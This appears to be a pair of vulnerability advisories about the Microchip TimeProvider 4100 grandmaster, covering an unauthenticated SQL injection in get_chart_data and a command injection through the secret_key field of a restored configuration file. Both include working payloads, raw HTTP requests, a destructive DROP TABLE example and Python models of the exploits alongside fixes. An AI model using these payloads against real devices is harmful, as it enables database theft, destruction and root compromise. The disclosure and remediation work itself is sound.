Thursday, October 10, 2024

CVE-2024-7801: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - UNAUTHENTICATED SQL INJECTION

A deep analysis of the "TimeProvider 4100 grandmaster" device firmware uncovered a SQL injection vulnerability in the get_chart_data web resource.
The vulnerability arises from improper handling of the channelId parameter, which is inserted directly into an SQLite query without sanitization or validation.

TimeProvider 4100 Grandmaster Device

More critically, the channelId parameter is used to build the table name in the SQL FROM clause. A table name cannot be passed as a bound parameter, so the code concatenates it into the query text; this design flaw allows unauthenticated attackers to change the query structure (for example by appending a UNION SELECT) and execute arbitrary SQL against the device database.

Successful exploitation could allow a threat actor to:

  • Extract sensitive internal data

  • Enumerate or alter database contents

  • Potentially affect system behavior depending on how data is used by other services

The vulnerability can be exploited remotely and without authentication, significantly increasing the potential risk to exposed devices.

Exploitation Steps

An attacker could exploit this vulnerability using the following approach:

  1. Send a crafted HTTP request to the vulnerable get_chart_data web endpoint.

  2. Manipulate the channelId parameter to inject SQL syntax that alters the intended query logic.

    • Example: a stacked payload such as channelId=temperature_data; DROP TABLE logs;-- (illustrative table names) is destructive only if the backend executes several statements per call, as sqlite3_exec() does; an API that prepares and steps a single statement runs only the first statement and ignores the rest. The working payload below relies on UNION instead, which stays within a single statement.

  3. Receive response data containing unintended results or confirmation of executed SQL commands.

An example of a malicious SQL payload is provided below:

SELECT%20sql,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20sqlite_master%20WHERE%20type='table'%20LIMIT%201%20OFFSET%200--

Request RAW:

POST /get_chart_data HTTP/1.1
Host: [device IP]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 146
Origin: https://[device IP]
Referer: https://[device IP]/perfmon_synce_stat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

metric=mtie_a&xRange=1&tStart=-1&channelName=tenMHz&channelId=1_status%20UNION%20 [malicious SQL payload] %20UNION%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20tenMHz1
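A scaled-down model of the flaw, added here as an example; it is not code from the advisory or from the device firmware. It keeps the pattern the advisory describes (channelName and channelId concatenated into the table name of a SELECT) but runs against a constructed three-column in-memory SQLite database rather than the device's 68-column tables, so the schema, the web_users table and all column names are assumptions; only the tenMHz1_status table name comes from the request above. It shows the UNION-based dump of sqlite_master, why the UNION must match the column count, why the stacked DROP TABLE variant depends on the backend API, and an allow-listing fix.

```python
"""Added example (not the advisory's code): a scaled-down, runnable model of
the get_chart_data injection. Schema, column names and the web_users table
are constructed; only the tenMHz1_status table name comes from the advisory."""
import re
import sqlite3


def build_sample_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the device's SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE tenMHz1_status (ts INTEGER, mtie_a REAL, flag INTEGER);
        INSERT INTO tenMHz1_status VALUES (1, 0.5, 0), (2, 0.72, 1);
        CREATE TABLE web_users (id INTEGER, username TEXT, pw_hash TEXT);
        INSERT INTO web_users VALUES (1, 'admin', 'constructed-hash');
    """)
    return conn


def get_chart_data_vulnerable(conn, channel_name: str, channel_id: str) -> list:
    """The flawed pattern: channelName + channelId become the FROM table.
    A table name cannot be a bound parameter, hence the concatenation."""
    sql = f"SELECT ts, mtie_a, flag FROM {channel_name}{channel_id}"
    return conn.execute(sql).fetchall()


def column_count(conn, table: str) -> int:
    """UNION only compiles when both SELECTs have the same width; the 68
    dummy columns in the advisory's payload exist to satisfy this check."""
    return len(conn.execute(f'PRAGMA table_info("{table}")').fetchall())


# Same technique as the advisory's payload, cut down to the 3-column table:
# dump the schema from sqlite_master, then read a sensitive table directly.
DUMP_SCHEMA = "1_status UNION SELECT name, sql, 3 FROM sqlite_master WHERE type='table'--"
DUMP_USERS = "1_status UNION SELECT username, pw_hash, id FROM web_users--"


def extracted_rows(conn, payload: str) -> list:
    """Rows in the response that did not come from the legitimate table."""
    legit = set(get_chart_data_vulnerable(conn, "tenMHz", "1_status"))
    rows = get_chart_data_vulnerable(conn, "tenMHz", payload)
    return [r for r in rows if r not in legit]


def stacked_query_runs(conn) -> bool:
    """The advisory's 'DROP TABLE ...;--' variant needs a backend that runs
    several statements per call (sqlite3_exec does). Python's sqlite3 module
    refuses a second statement, so this returns False here."""
    try:
        conn.execute("SELECT 1 FROM tenMHz1_status; DROP TABLE web_users;--")
    except (sqlite3.Warning, sqlite3.Error):
        return False
    gone = conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE name='web_users'").fetchone()[0] == 0
    return gone


IDENT = re.compile(r"^[A-Za-z0-9_]+$")


def get_chart_data_hardened(conn, channel_name: str, channel_id: str) -> list:
    """Fix: identifiers are allow-listed by pattern, the composed table must
    already exist (checked with a bound parameter), and the name is quoted
    as an SQL identifier. Anything else is rejected before reaching SQLite."""
    if not (IDENT.match(channel_name) and IDENT.match(channel_id)):
        raise ValueError("invalid channel identifier")
    table = channel_name + channel_id
    exists = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type='table' AND name=?", (table,)
    ).fetchone()
    if exists is None:
        raise ValueError("unknown channel table")
    return conn.execute(f'SELECT ts, mtie_a, flag FROM "{table}"').fetchall()


if __name__ == "__main__":
    db = build_sample_db()
    print("legit:", get_chart_data_vulnerable(db, "tenMHz", "1_status"))
    print("schema leak:", extracted_rows(db, DUMP_SCHEMA))
    print("credential leak:", extracted_rows(db, DUMP_USERS))
    print("stacked statements ran:", stacked_query_runs(db))
    try:
        get_chart_data_hardened(db, "tenMHz", DUMP_USERS)
    except ValueError as err:
        print("hardened handler rejected payload:", err)
```

The existence check in the hardened handler is the minimum; on a device with a fixed set of chart tables, a static mapping from (channelName, channelId) to table names is stricter still, because it never lets user input reach the query text at all.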

# End

Conclusion:

This vulnerability highlights the risks of dynamic query construction without proper input validation. The fact that the flaw is unauthenticated and affects a core web resource significantly elevates the impact and exploitability.

Reporting Information:

CVE Identifier: CVE-2024-7801
CVSS Score: 6.3
Affected Versions: Firmware 1.0 through 2.4.7
Tested on: Firmware release 2.3.12 
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-7801
Vendor Reference: 
https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-unathenticated-sql-injection
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.

Wednesday, October 09, 2024

CVE-2024-9054: MICROCHIP TIMEPROVIDER® 4100 GRANDMASTER CONFIG FILE - REMOTE CODE EXECUTION (RCE)

Continuing the analysis of the "TimeProvider 4100 grandmaster" device, a Remote Code Execution (RCE) vulnerability was identified in the handling of the device configuration file.

TimeProvider 4100 Grandmaster Device

The issue stems from improper handling of user input within the device's configuration file, specifically the value of the <secret_key> XML tag.

An attacker with access to the device's management web interface can download the configuration file, place a malicious payload in the secret_key field and upload it again through the restore function. Once the modified configuration is restored, the payload remains dormant until a login attempt is made through any active service such as SSH, Telnet or the console interface.

On login, the system evaluates the stored value, and the backtick-enclosed text in secret_key is executed as an arbitrary operating system command on the device; as the conclusion below notes, this yields persistent root access.

Exploitation Steps

  1. Authenticate to the device’s management web interface.

  2. Download the current configuration file from the interface.

  3. Modify the <secret_key> field in the configuration file, inserting a malicious OS command or script.

  4. Save the modified configuration file.

  5. Restore and apply the configuration using the device’s upload function.

  6. Trigger execution by logging in through any enabled service (e.g., SSH, Telnet or the console); the login action causes the injected command to run.

An example of a malicious XML configuration file is provided below:

<?xml version="1.0"?>
[...]
  <security>
    [...]
    <server>
      <ip>192.168.1.1</ip>
      <secret_key>`ping 192.168.1.20`</secret_key>
      [...]
    </server>
    [...]
  </security>
[...]

Request RAW:

POST /config_restore HTTP/1.1
Host: [device IP]
Cookie: ci_session=[session cookie]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------182708909322642582691204887002
Content-Length: 206640
Origin: https://[device IP]
Referer: https://[device IP]/configbackuprestore
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

-----------------------------182708909322642582691204887002
Content-Disposition: form-data; name="file"; filename="tp4100_cfg.txt"
Content-Type: text/plain

[XML configuration file containing the injection on "secret_key" tag]
-----------------------------182708909322642582691204887002
Content-Disposition: form-data; name="pword"

[Web account password in clear-text]
-----------------------------182708909322642582691204887002--
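An added example, not code from the advisory or from the device firmware, that models the three parts of this issue at a scale that runs offline. The XML layout and element names follow the configuration excerpt above; the login-side consumer that pastes secret_key into a shell command line is an assumed model of how the backticks come to be evaluated (the advisory does not show that code), and a harmless echo replaces the ping from the page. Alongside the tampering step it shows the two fixes a practitioner would want: the consumer passing the secret as a separate argv element instead of through a shell, and an upload-time check for /config_restore that rejects secrets containing shell metacharacters.

```python
"""Added example (not the advisory's code): models the secret_key injection
at a scale that runs offline. The XML layout follows the advisory; the
login-side consumer that pastes secret_key into a shell command line is an
ASSUMED model of how the backticks get evaluated."""
import re
import subprocess
import xml.etree.ElementTree as ET

# Constructed configuration in the shape shown in the advisory (values made up).
SAMPLE_CONFIG = """<?xml version="1.0"?>
<config>
  <security>
    <server>
      <ip>192.168.1.1</ip>
      <secret_key>s3cret</secret_key>
    </server>
  </security>
</config>
"""

# Benign stand-in for the advisory's `ping 192.168.1.20`: proves that the
# backticks were evaluated without needing network access.
PAYLOAD = "`echo INJECTED`"


def inject_secret_key(xml_text: str, payload: str) -> str:
    """Step 3 of the procedure: rewrite <secret_key> in a downloaded config."""
    root = ET.fromstring(xml_text)
    node = root.find("./security/server/secret_key")
    if node is None:
        raise ValueError("no <secret_key> element in configuration")
    node.text = payload
    return ET.tostring(root, encoding="unicode")


def read_secret_key(xml_text: str) -> str:
    """What the device would read back after the restore."""
    return ET.fromstring(xml_text).findtext("./security/server/secret_key")


def login_handler_vulnerable(secret: str) -> str:
    """ASSUMED model of the bug: the restored secret is interpolated into a
    shell command line, so /bin/sh performs command substitution on it."""
    cmd = f"echo auth-with {secret}"
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout.strip()


def login_handler_fixed(secret: str) -> str:
    """Fix: pass the secret as a discrete argv element. No shell is involved,
    so backticks and $() are just characters in the string."""
    out = subprocess.run(["echo", "auth-with", secret], capture_output=True, text=True)
    return out.stdout.strip()


# Second defence, applied where /config_restore accepts the upload: a shared
# secret has no business containing shell metacharacters at all.
SAFE_SECRET = re.compile(r"^[A-Za-z0-9._~+/=-]{1,64}$")


def validate_restored_config(xml_text: str) -> list:
    """Return a list of problems; an empty list means the file may be applied."""
    problems = []
    for node in ET.fromstring(xml_text).iter("secret_key"):
        value = node.text or ""
        if not SAFE_SECRET.match(value):
            problems.append(f"secret_key {value!r} contains disallowed characters")
    return problems


if __name__ == "__main__":
    tampered = inject_secret_key(SAMPLE_CONFIG, PAYLOAD)
    print("restored secret_key:", read_secret_key(tampered))
    print("vulnerable login handler:", login_handler_vulnerable(PAYLOAD))
    print("fixed login handler:     ", login_handler_fixed(PAYLOAD))
    print("upload validation:", validate_restored_config(tampered) or "ok")
```

The argv-based consumer is the real fix: it removes the shell from the path between stored configuration and process execution, so the validator is defence in depth rather than the only barrier. Both are needed on a device where the same configuration value is consumed by several login services.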

# End

Conclusion:

This vulnerability can result in full system compromise, allowing an attacker to execute unauthorized commands, establish persistent root access or disrupt normal device operation.

Reporting Information:

CVE Identifier: CVE-2024-9054
CVSS Score: 8.5
Affected Versions: Firmware 1.0 through 2.4.7
Tested on: Firmware release 2.3.12 
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-9054
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-rce-through-configuration-file
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.